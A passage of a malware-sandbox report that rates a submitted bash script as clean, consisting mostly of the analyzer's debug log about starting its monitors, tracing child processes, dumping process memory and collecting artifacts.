Status: Clean
Analysis
| Category | Package | Started | Completed | Duration | Options | Log(s) | MalScore |
|---|---|---|---|---|---|---|---|
| FILE | bash | 2025-12-08 13:51:40 | 2025-12-08 13:52:13 | 33 seconds | Show Options | Show Analysis Log | 2.5 |
vnc_port=5900
2025-12-08 05:51:39,000 [root] DEBUG: Starting analyzer from: /tmp7_5yn7x6 2025-12-08 05:51:39,001 [root] DEBUG: Storing results at: /tmp/eNwbVgsgtA 2025-12-08 05:51:39,002 [root] DEBUG: Importing auxiliary module "modules.auxiliary.auditd"... 2025-12-08 05:51:39,004 [root] DEBUG: Importing auxiliary module "modules.auxiliary.filecollector"... 2025-12-08 05:51:39,008 [root] DEBUG: Importing auxiliary module "modules.auxiliary.human"... 2025-12-08 05:51:39,009 [root] DEBUG: Importing auxiliary module "modules.auxiliary.screenshots"... 2025-12-08 05:51:39,020 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops' 2025-12-08 05:51:39,029 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw' 2025-12-08 05:51:39,065 [root] DEBUG: Importing auxiliary module "modules.auxiliary.sysmon"... 2025-12-08 05:51:39,066 [root] DEBUG: Importing auxiliary module "modules.auxiliary.tracee"... 2025-12-08 05:51:39,068 [root] DEBUG: Initialized auxiliary module "Auditd" 2025-12-08 05:51:39,068 [root] DEBUG: Trying to start auxiliary module "Auditd"... 2025-12-08 05:51:39,068 [root] DEBUG: Started auxiliary module "Auditd" 2025-12-08 05:51:39,069 [modules.auxiliary.filecollector] INFO: FileCollector run started 2025-12-08 05:51:39,077 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir sbin 2025-12-08 05:51:39,078 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir srv 2025-12-08 05:51:39,078 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir media 2025-12-08 05:51:39,080 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir libx32 2025-12-08 05:51:39,081 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir tmp7_5yn7x6 2025-12-08 05:51:39,082 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir etc 2025-12-08 05:51:39,148 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir mnt 2025-12-08 05:51:39,149 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir tmpij155kl0 2025-12-08 05:51:39,151 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir boot 2025-12-08 05:51:39,153 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir cdrom 2025-12-08 05:51:39,154 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir bin 2025-12-08 05:51:39,154 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir root 2025-12-08 05:51:39,157 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir opt 2025-12-08 05:51:39,158 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir snap 2025-12-08 05:51:39,753 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir tmp 2025-12-08 05:51:39,753 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir home 2025-12-08 05:51:39,788 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir lost+found 2025-12-08 05:51:39,789 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir lib32 2025-12-08 05:51:39,789 [modules.auxiliary.filecollector] INFO: FileCollector setup complete 2025-12-08 05:51:40,073 [root] DEBUG: Initialized auxiliary module "FileCollector" 2025-12-08 05:51:40,073 [root] DEBUG: Trying to start auxiliary module "FileCollector"... 2025-12-08 05:51:40,073 [root] DEBUG: Started auxiliary module "FileCollector" 2025-12-08 05:51:40,073 [modules.auxiliary.human] DEBUG: Human init complete 2025-12-08 05:51:40,074 [root] DEBUG: Initialized auxiliary module "Human" 2025-12-08 05:51:40,074 [root] DEBUG: Trying to start auxiliary module "Human"... 2025-12-08 05:51:40,074 [root] DEBUG: Started auxiliary module "Human" 2025-12-08 05:51:40,074 [root] DEBUG: Initialized auxiliary module "Screenshots" 2025-12-08 05:51:40,074 [root] DEBUG: Trying to start auxiliary module "Screenshots"... 2025-12-08 05:51:40,074 [root] DEBUG: Started auxiliary module "Screenshots" 2025-12-08 05:51:40,074 [root] DEBUG: Initialized auxiliary module "Sysmon" 2025-12-08 05:51:40,074 [root] DEBUG: Trying to start auxiliary module "Sysmon"... 2025-12-08 05:51:40,091 [root] DEBUG: Started auxiliary module "Sysmon" 2025-12-08 05:51:40,092 [modules.auxiliary.tracee] INFO: docker start 2025-12-08 05:51:40,092 [root] DEBUG: Initialized auxiliary module "Docker" 2025-12-08 05:51:40,092 [root] DEBUG: Trying to start auxiliary module "Docker"... 2025-12-08 05:51:40,150 [modules.auxiliary.tracee] DEBUG: Starting docker container 2025-12-08 05:51:40,168 [modules.auxiliary.tracee] DEBUG: Attempt to remove Tracee container if it exists. 2025-12-08 05:51:40,168 [modules.auxiliary.tracee] DEBUG: sudo docker run --name tracee -d --pid=host --cgroupns=host --privileged -v /etc/os-release:/etc/os-release-host:ro -v /tmp7_5yn7x6/tracee-artifacts/:/tmp/tracee/out/host -v /var/run:/var/run:ro -v /tmp7_5yn7x6/modules/auxiliary/tracee:/policy aquasec/tracee:latest --output json --output option:parse-arguments,exec-env,exec-hash --policy /policy/policy.yml --cache cache-type=mem --cache mem-cache-size=1024 --capture bpf --capture module --capture write --signatures-dir=/policy/signatures --signatures-dir=./signatures 2025-12-08 05:51:40,538 [modules.auxiliary.tracee] DEBUG: Docker container started: c9d51e009fbb4d246c44664f74b2e20b8763a4aaa8e74d7f8b191a12f5f50932 2025-12-08 05:51:40,540 [lib.common.results] INFO: File /bin/sh-shim size is 125688, Max size: 100000000 2025-12-08 05:51:50,555 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-32759 size is 34, Max size: 100000000 2025-12-08 05:51:50,575 [modules.auxiliary.tracee] INFO: Try to stream 2025-12-08 05:51:50,576 [modules.auxiliary.tracee] INFO: <lib.common.results.NetlogFile object at 0x7fbe3d528e50> 2025-12-08 05:51:50,576 [modules.auxiliary.tracee] INFO: Streamstart 2025-12-08 05:51:50,576 [root] DEBUG: Started auxiliary module "Docker" 2025-12-08 05:51:50,577 [lib.core.packages] INFO: /bin/bash 2025-12-08 05:51:50,578 [lib.core.packages] INFO: Process will start with strace + sh-shim for Tracee's scope 2025-12-08 05:51:50,578 [lib.core.packages] INFO: sudo strace -v -o /dev/stderr -s 800 -ttf /bin/sh-shim -c "/bin/bash /tmp/1cf0094b3df50bafb3e48.sh" 2025-12-08 05:51:50,579 [lib.core.packages] INFO: Process started 2025-12-08 05:51:50,579 [root] INFO: Added new process to list with pid: 2169 2025-12-08 05:51:50,580 [root] INFO: New child process detected: 2171 2025-12-08 05:51:50,581 [root] ERROR: Could not read memory range 7fc79aa02000-7fc79aa10000: [Errno 5] Input/output error 2025-12-08 05:51:50,582 [root] ERROR: Could not read memory range 7ffe24665000-7ffe24669000: [Errno 5] Input/output error 2025-12-08 05:51:50,583 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2171.dmp size is 643072, Max size: 100000000 2025-12-08 05:51:50,589 [root] INFO: Added new process to list with pid: 2171 2025-12-08 05:51:50,756 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 68, Max size: 100000000 2025-12-08 05:51:50,762 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 102, Max size: 100000000 2025-12-08 05:51:50,765 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 134, Max size: 100000000 2025-12-08 05:51:50,840 [root] INFO: New child process detected: 2176 2025-12-08 05:51:50,879 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 144, Max size: 100000000 2025-12-08 05:51:50,880 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 146, Max size: 100000000 2025-12-08 05:51:50,884 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 156, Max size: 100000000 2025-12-08 05:51:50,885 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 170, Max size: 100000000 2025-12-08 05:51:50,889 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 171, Max size: 100000000 2025-12-08 05:51:50,901 [root] ERROR: Could not read memory range 7ffd31cce000-7ffd31cd2000: [Errno 5] Input/output error 2025-12-08 05:51:50,901 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2176.dmp size is 17321984, Max size: 100000000 2025-12-08 05:51:50,916 [lib.common.results] INFO: File /tmp/WTF size is 0, Max size: 100000000 2025-12-08 05:51:50,932 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 176, Max size: 100000000 2025-12-08 05:51:50,951 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 215, Max size: 100000000 2025-12-08 05:51:51,001 [root] INFO: Added new process to list with pid: 2176 2025-12-08 05:51:51,002 [root] INFO: New child process detected: 2179 2025-12-08 05:51:51,002 [root] ERROR: Process with PID 2179 not found. 2025-12-08 05:51:51,003 [root] ERROR: Memdump file not found in guest machine for PID 2179 2025-12-08 05:51:51,003 [root] INFO: Added new process to list with pid: 2179 2025-12-08 05:51:51,003 [root] INFO: New child process detected: 2172 2025-12-08 05:51:51,073 [root] ERROR: Could not read memory range 7ffe91fec000-7ffe91ff0000: [Errno 5] Input/output error 2025-12-08 05:51:51,074 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2172.dmp size is 19468288, Max size: 100000000 2025-12-08 05:51:51,170 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 284, Max size: 100000000 2025-12-08 05:51:51,193 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 350, Max size: 100000000 2025-12-08 05:51:51,211 [root] INFO: Added new process to list with pid: 2172 2025-12-08 05:51:51,212 [root] INFO: New child process detected: 2175 2025-12-08 05:51:51,217 [root] ERROR: Could not read memory range 7fffc55fa000-7fffc55fe000: [Errno 5] Input/output error 2025-12-08 05:51:51,217 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2175.dmp size is 2523136, Max size: 100000000 2025-12-08 05:51:51,238 [root] INFO: Added new process to list with pid: 2175 2025-12-08 05:51:51,318 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 355, Max size: 100000000 2025-12-08 05:51:51,322 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 376, Max size: 100000000 2025-12-08 05:51:51,326 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 387, Max size: 100000000 2025-12-08 05:51:51,344 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 392, Max size: 100000000 2025-12-08 05:51:51,349 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 404, Max size: 100000000 2025-12-08 05:51:51,352 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 432, Max size: 100000000 2025-12-08 05:51:51,444 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 500, Max size: 100000000 2025-12-08 05:51:51,451 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 534, Max size: 100000000 2025-12-08 05:51:51,458 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 566, Max size: 100000000 2025-12-08 05:51:51,489 [root] INFO: New child process detected: 2191 2025-12-08 05:51:51,500 [root] ERROR: Could not read memory range 7ffe28307000-7ffe2830b000: [Errno 5] Input/output error 2025-12-08 05:51:51,501 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2191.dmp size is 3665920, Max size: 100000000 2025-12-08 05:51:51,527 [root] INFO: Added new process to list with pid: 2191 2025-12-08 05:51:51,580 [root] INFO: Process with pid 2179 has terminated 2025-12-08 05:51:51,604 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 572, Max size: 100000000 2025-12-08 05:51:51,607 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 585, Max size: 100000000 2025-12-08 05:51:51,610 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 595, Max size: 100000000 2025-12-08 05:51:51,616 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 603, Max size: 100000000 2025-12-08 05:51:51,628 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 619, Max size: 100000000 2025-12-08 05:51:51,632 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 647, Max size: 100000000 2025-12-08 05:51:51,703 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 716, Max size: 100000000 2025-12-08 05:51:51,708 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 750, Max size: 100000000 2025-12-08 05:51:51,712 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 782, Max size: 100000000 2025-12-08 05:51:51,778 [root] INFO: New child process detected: 2197 2025-12-08 05:51:51,833 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 785, Max size: 100000000 2025-12-08 05:51:51,836 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 802, Max size: 100000000 2025-12-08 05:51:51,840 [root] ERROR: Could not read memory range 7f227f421000-7f227f42f000: [Errno 5] Input/output error 2025-12-08 05:51:51,844 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 819, Max size: 100000000 2025-12-08 05:51:51,850 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2197.dmp size is 9752576, Max size: 100000000 2025-12-08 05:51:51,918 [root] INFO: Added new process to list with pid: 2197 2025-12-08 05:51:51,920 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 836, Max size: 100000000 2025-12-08 05:51:51,926 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 864, Max size: 100000000 2025-12-08 05:51:51,988 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 933, Max size: 100000000 2025-12-08 05:51:51,996 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 999, Max size: 100000000 2025-12-08 05:51:52,084 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1006, Max size: 100000000 2025-12-08 05:51:52,085 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1019, Max size: 100000000 2025-12-08 05:51:52,090 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1021, Max size: 100000000 2025-12-08 05:51:52,091 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1022, Max size: 100000000 2025-12-08 05:51:52,093 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1024, Max size: 100000000 2025-12-08 05:51:52,094 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1025, Max size: 100000000 2025-12-08 05:51:52,099 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1036, Max size: 100000000 2025-12-08 05:51:52,115 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1053, Max size: 100000000 2025-12-08 05:51:52,120 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1081, Max size: 100000000 2025-12-08 05:51:52,172 [root] INFO: New child process detected: 2208 2025-12-08 05:51:52,175 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1152, Max size: 100000000 2025-12-08 05:51:52,177 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1186, Max size: 100000000 2025-12-08 05:51:52,180 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1218, Max size: 100000000 2025-12-08 05:51:52,257 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1221, Max size: 100000000 2025-12-08 05:51:52,259 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2208.dmp size is 14905344, Max size: 100000000 2025-12-08 05:51:52,261 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1231, Max size: 100000000 2025-12-08 05:51:52,268 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1255, Max size: 100000000 2025-12-08 05:51:52,294 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1274, Max size: 100000000 2025-12-08 05:51:52,302 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1302, Max size: 100000000 2025-12-08 05:51:52,368 [root] INFO: Added new process to list with pid: 2208 2025-12-08 05:51:52,422 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1371, Max size: 100000000 2025-12-08 05:51:52,425 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1405, Max size: 100000000 2025-12-08 05:51:52,428 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1437, Max size: 100000000 2025-12-08 05:51:52,547 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1446, Max size: 100000000 2025-12-08 05:51:52,549 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1464, Max size: 100000000 2025-12-08 05:51:52,552 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1468, Max size: 100000000 2025-12-08 05:51:52,555 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1474, Max size: 100000000 2025-12-08 05:51:52,577 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1491, Max size: 100000000 2025-12-08 05:51:52,581 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1519, Max size: 100000000 2025-12-08 05:51:52,583 [root] INFO: Process with pid 2208 has terminated 2025-12-08 05:51:52,583 [root] INFO: Process with pid 2191 has terminated 2025-12-08 05:51:52,584 [root] INFO: Process with pid 2197 has terminated 2025-12-08 05:51:52,619 [root] INFO: New child process detected: 2219 2025-12-08 05:51:52,649 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2219.dmp size is 15085568, Max size: 100000000 2025-12-08 05:51:52,731 [root] INFO: Added new process to list with pid: 2219 2025-12-08 05:51:52,740 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1587, Max size: 100000000 2025-12-08 05:51:52,742 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1621, Max size: 100000000 2025-12-08 05:51:52,746 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1653, Max size: 100000000 2025-12-08 05:51:52,820 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1658, Max size: 100000000 2025-12-08 05:51:52,822 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1668, Max size: 100000000 2025-12-08 05:51:52,823 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1676, Max size: 100000000 2025-12-08 05:51:52,826 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1685, Max size: 100000000 2025-12-08 05:51:52,828 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1690, Max size: 100000000 2025-12-08 05:51:52,847 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1695, Max size: 100000000 2025-12-08 05:51:52,851 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1733, Max size: 100000000 2025-12-08 05:51:52,853 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1734, Max size: 100000000 2025-12-08 05:51:52,927 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1803, Max size: 100000000 2025-12-08 05:51:52,930 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1837, Max size: 100000000 2025-12-08 05:51:52,933 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1869, Max size: 100000000 2025-12-08 05:51:52,984 [root] INFO: New child process detected: 2228 2025-12-08 05:51:53,007 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1874, Max size: 100000000 2025-12-08 05:51:53,010 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1899, Max size: 100000000 2025-12-08 05:51:53,023 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1906, Max size: 100000000 2025-12-08 05:51:53,033 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1923, Max size: 100000000 2025-12-08 05:51:53,040 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 1951, Max size: 100000000 2025-12-08 05:51:53,042 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2228.dmp size is 1470464, Max size: 100000000 2025-12-08 05:51:53,061 [root] INFO: Added new process to list with pid: 2228 2025-12-08 05:51:53,138 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2020, Max size: 100000000 2025-12-08 05:51:53,145 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2054, Max size: 100000000 2025-12-08 05:51:53,150 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2086, Max size: 100000000 2025-12-08 05:51:53,286 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2087, Max size: 100000000 2025-12-08 05:51:53,288 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2094, Max size: 100000000 2025-12-08 05:51:53,291 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2099, Max size: 100000000 2025-12-08 05:51:53,293 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2102, Max size: 100000000 2025-12-08 05:51:53,295 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2107, Max size: 100000000 2025-12-08 05:51:53,297 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2111, Max size: 100000000 2025-12-08 05:51:53,299 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2114, Max size: 100000000 2025-12-08 05:51:53,301 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2118, Max size: 100000000 2025-12-08 05:51:53,303 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2123, Max size: 100000000 2025-12-08 05:51:53,315 [root] INFO: New child process detected: 2235 2025-12-08 05:51:53,323 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2235.dmp size is 503808, Max size: 100000000 2025-12-08 05:51:53,331 [root] INFO: Added new process to list with pid: 2235 2025-12-08 05:51:53,337 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2140, Max size: 100000000 2025-12-08 05:51:53,342 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2168, Max size: 100000000 2025-12-08 05:51:53,430 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2237, Max size: 100000000 2025-12-08 05:51:53,437 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2271, Max size: 100000000 2025-12-08 05:51:53,444 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2303, Max size: 100000000 2025-12-08 05:51:53,535 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2311, Max size: 100000000 2025-12-08 05:51:53,538 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2315, Max size: 100000000 2025-12-08 05:51:53,552 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2340, Max size: 100000000 2025-12-08 05:51:53,559 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2385, Max size: 100000000 2025-12-08 05:51:53,583 [modules.auxiliary.tracee] INFO: <lib.common.results.NetlogFile object at 0x7fbe3d528e50> 2025-12-08 05:51:53,587 [root] INFO: Process with pid 2219 has terminated 2025-12-08 05:51:53,587 [root] INFO: Process with pid 2235 has terminated 2025-12-08 05:51:53,587 [root] INFO: Process with pid 2228 has terminated 2025-12-08 05:51:53,614 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2453, Max size: 100000000 2025-12-08 05:51:53,618 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2487, Max size: 100000000 2025-12-08 05:51:53,621 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2519, Max size: 100000000 2025-12-08 05:51:53,664 [modules.auxiliary.tracee] INFO: CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES c9d51e009fbb aquasec/tracee:latest "/tracee/entrypoint.…" 13 seconds ago Up 13 seconds tracee 2025-12-08 05:51:53,711 [modules.auxiliary.tracee] INFO: sudo tail +1f /var/lib/docker/containers/c9d51e009fbb4d246c44664f74b2e20b8763a4aaa8e74d7f8b191a12f5f50932/c9d51e009fbb4d246c44664f74b2e20b8763a4aaa8e74d7f8b191a12f5f50932-json.log 2025-12-08 05:51:53,813 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2521, Max size: 100000000 2025-12-08 05:51:53,815 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2525, Max size: 100000000 2025-12-08 05:51:53,817 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2526, Max size: 100000000 2025-12-08 05:51:53,819 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2527, Max size: 100000000 2025-12-08 05:51:53,821 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2529, Max size: 100000000 2025-12-08 05:51:53,823 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2534, Max size: 100000000 2025-12-08 05:51:53,827 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2537, Max size: 100000000 2025-12-08 05:51:53,841 [root] INFO: New child process detected: 2268 2025-12-08 05:51:53,843 [root] ERROR: Could not read memory range 7ffed6bf1000-7ffed6bf5000: [Errno 5] Input/output error 2025-12-08 05:51:53,843 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2268.dmp size is 380928, Max size: 100000000 2025-12-08 05:51:53,846 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33280 size is 2556, Max 